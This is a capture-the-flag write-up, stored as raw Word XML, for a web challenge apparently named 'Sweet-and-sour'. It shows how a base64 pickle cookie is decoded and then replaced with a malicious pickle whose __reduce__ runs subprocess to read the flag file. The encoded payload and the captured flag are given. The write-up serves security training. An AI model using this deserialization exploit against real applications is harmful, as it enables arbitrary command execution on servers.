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A1D22" w14:textId="1EDE86DA" w:rsidR="00C77E2E" w:rsidRDefault="00C77E2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Sweet-and-sour</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD9889F" w14:textId="6EFDDC3A" w:rsidR="009338D9" w:rsidRDefault="009338D9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>A curious thing we can find using devtools is this cookie header in network section</w:t>
      </w:r>
      <w:r w:rsidR="00BF317E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, which provides the following information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED6F75E" w14:textId="3CA2D4AA" w:rsidR="009338D9" w:rsidRDefault="009338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993DC29" wp14:editId="252C1348">
            <wp:extent cx="5943600" cy="2630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5CFE" w14:textId="1BF68C31" w:rsidR="00BF317E" w:rsidRDefault="00BF317E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF317E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>auth_cookie=1d5624063a676527234b383e3b232537241446317646641434252c4661334966533718;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6CF5A9" w14:textId="44D5E6C8" w:rsidR="00BF317E" w:rsidRDefault="00BF317E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF317E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>key=52T604BWF9UWHPLXJ3LAGL73AVI4F99TYD6;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D034FC9" w14:textId="10B8FFD1" w:rsidR="00BF317E" w:rsidRDefault="00BF317E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF317E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>data=gANYCwAAAFRyeSBIYXJkZXIhcQAu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>l;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243AB810" w14:textId="673F6026" w:rsidR="00BF317E" w:rsidRDefault="00BF317E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>the “data” part looks very decodable, so let’s try our luck with base64 decoding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79033E08" w14:textId="05586FFE" w:rsidR="00C77E2E" w:rsidRDefault="009338D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F833B28" wp14:editId="78813FB9">
            <wp:extent cx="52578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231D" w14:textId="2277E181" w:rsidR="00BF317E" w:rsidRDefault="00BF317E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Guess we didn’t try hard enough. </w:t>
      </w:r>
      <w:r w:rsidR="0094402F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Now we can try python code in vscode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F720512" w14:textId="542D4AFA" w:rsidR="00764585" w:rsidRDefault="00764585">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64631CBD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pickle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49527007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</w:p>
    <w:p w14:paraId="7AA08F8F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subprocess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB06B0A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70755D9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EvilPickle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F751903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5C53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__reduce__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1A4D3DE4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subprocess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check_output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, ([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>'cat'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>'/home/ctf/flag'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14:paraId="204C1757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malicious_pickle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dumps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EvilPickle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22283156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>"malicious_pickle.data"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>"wb"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55C53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F963B7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malicious_pickle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735B84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08AB07F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encoded_payload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55C53">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="4EC9B0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>base64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b64encode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malicious_pickle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63A1ADEF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55C53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55C53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"Base64 Payload: </w:t>
      </w:r>
      <w:r w:rsidRPr="00155C53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55C53">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>encoded_payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00155C53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55C5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5C5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C9A93B3" w14:textId="77777777" w:rsidR="00155C53" w:rsidRPr="00155C53" w:rsidRDefault="00155C53" w:rsidP="00155C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6F7450" w14:textId="77777777" w:rsidR="000C12C3" w:rsidRDefault="000C12C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C12C3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>gASVPgAAAAAAAACMCnN1YnByb2Nlc3OUjAxjaGVja19vdXRwdXSUk5RdlCiMA2NhdJSMDi9ob21lL2N0Zi9mbGFnlGWFlFKULg==</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775F853D" w14:textId="7D1267B3" w:rsidR="00764585" w:rsidRDefault="000C12C3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>now we insert this instead of our cookie:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF7FDDF" w14:textId="2173F671" w:rsidR="00764585" w:rsidRDefault="000C12C3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8C222D7" wp14:editId="1D0E5CEA">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1317314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1408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B4FE" w14:textId="462126ED" w:rsidR="00764585" w:rsidRDefault="00764585">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>After final substitution of the data cooki</w:t>
      </w:r>
      <w:r w:rsidR="000C12C3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B648ED" w14:textId="2294702F" w:rsidR="00764585" w:rsidRPr="00C77E2E" w:rsidRDefault="00764585">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764585">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CTF{ccc1ccef217ed19c492bdada049ad2b0fbf1adcb72a92f13ab153aae068f797f}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2FEAED" w14:textId="41669831" w:rsidR="00C77E2E" w:rsidRPr="00764585" w:rsidRDefault="00C77E2E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00C77E2E" w:rsidRPr="00764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18"/>
    <w:rsid w:val="000051C8"/>
    <w:rsid w:val="000C12C3"/>
    <w:rsid w:val="00155C53"/>
    <w:rsid w:val="00242597"/>
    <w:rsid w:val="005343D9"/>
    <w:rsid w:val="005607CF"/>
    <w:rsid w:val="0070466F"/>
    <w:rsid w:val="0070570D"/>
    <w:rsid w:val="00764585"/>
    <w:rsid w:val="009338D9"/>
    <w:rsid w:val="0094402F"/>
    <w:rsid w:val="00967A89"/>
    <w:rsid w:val="009700A2"/>
    <w:rsid w:val="009A3FB8"/>
    <w:rsid w:val="00BA0CB8"/>
    <w:rsid w:val="00BF317E"/>
    <w:rsid w:val="00C77E2E"/>
    <w:rsid w:val="00DD3E0B"/>
    <w:rsid w:val="00F86B04"/>
    <w:rsid w:val="00FC7961"/>
    <w:rsid w:val="00FF3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D9C9A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7D0D6CF7-5663-486D-A9C9-53599CF6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8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Nini Vatcharadze</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Kevanishvili Zura</cp:lastModifiedBy>
  <cp:revision>12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-17T09:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-23T17:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>